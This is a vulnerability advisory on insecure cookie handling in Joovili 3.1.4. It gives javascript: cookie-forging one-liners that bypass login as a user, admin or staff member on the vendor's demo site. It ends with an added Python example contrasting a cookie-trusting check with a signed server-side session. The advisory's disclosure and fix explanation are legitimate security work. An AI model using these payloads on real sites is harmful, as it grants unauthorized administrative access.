Joovili 3.1.4 Insecure Cookie Handling Vulnerability

Author: ZoRLu
Risk: Security Risk Unsorted
0day-ID: 0day-ID-4035
Category: web applications
Date added: 02-11-2008
Platform: unsorted
====================================================
Joovili 3.1.4 Insecure Cookie Handling Vulnerability
====================================================


[~] Joovili Script Insecure Cookie Handling Vulnerability
[~]
[~] version: 3.1.4 
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 02.11.2008
[~] 
[~] N0T: a.q kpss : ) )
[~]
[~] ----------------------------------------------------------

demo admin login:

http://demo.joovili.com/admin

demo user login:

http://demo.joovili.com/

demo staff login:

http://demo.joovili.com/staff/


exploit for user:

javascript:document.cookie = "session_id=real_id; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=real_user_name; path=/"; 


for demo user:

javascript:document.cookie = "session_id=304; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=demo; path=/";

for demo admin:

javascript:document.cookie = "session_admin_id=1; path=/"; document.cookie = "session_admin_username=admin; path=/"; document.cookie = "session_admin=true; path=/";

for demo staff:

javascript:document.cookie = "session_staff_id=3; path=/"; document.cookie = "session_staff_username=staff; path=/"; document.cookie = "session_staff=true; path=/";

[~]----------------------------------------------------------------------
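
The cookie lines above only work if the server takes login state and identity from values the browser supplies. The following is an added example, not Joovili's code and not part of the advisory, that contrasts a hypothetical check of that kind with one that keeps identity in a server-side session; the function names, SERVER_KEY and the "session" cookie name are assumptions, and only the forged cookie names and values come from the advisory.

```python
import hashlib
import hmac
import secrets

# Assumption: per-deployment secret kept on the server, never sent to clients.
SERVER_KEY = secrets.token_bytes(32)


def _tag(sid):
    return hmac.new(SERVER_KEY, sid.encode(), hashlib.sha256).hexdigest()


def logged_in_user_vulnerable(cookies):
    """Hypothetical check of the kind the advisory implies: the browser's
    own cookie values decide whether and as whom the request is logged in."""
    if cookies.get("session_logged_in") == "true":
        return cookies.get("session_username")
    return None


def issue_session(username, store):
    """Call only after the password check succeeded. The cookie carries an
    unguessable id plus a MAC; the username stays in the server-side store."""
    sid = secrets.token_urlsafe(32)
    store[sid] = username
    return {"session": sid + "." + _tag(sid)}


def logged_in_user_hardened(cookies, store):
    """Identity is looked up server-side; flag/username cookies are ignored."""
    sid, _, tag = cookies.get("session", "").partition(".")
    if not sid or not hmac.compare_digest(tag.encode(), _tag(sid).encode()):
        return None
    return store.get(sid)


# Constructed input: cookie names and values from the advisory's demo-user line.
FORGED = {"session_id": "304", "session_logged_in": "true",
          "session_username": "demo"}

if __name__ == "__main__":
    store = {}
    print("vulnerable:", logged_in_user_vulnerable(FORGED))
    print("hardened:  ", logged_in_user_hardened(FORGED, store))
    print("real login:", logged_in_user_hardened(issue_session("demo", store), store))
```

The same rule applies to the admin and staff cookies: role and user id belong in the server-side record, and the session cookie itself should be set with the HttpOnly and Secure attributes.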


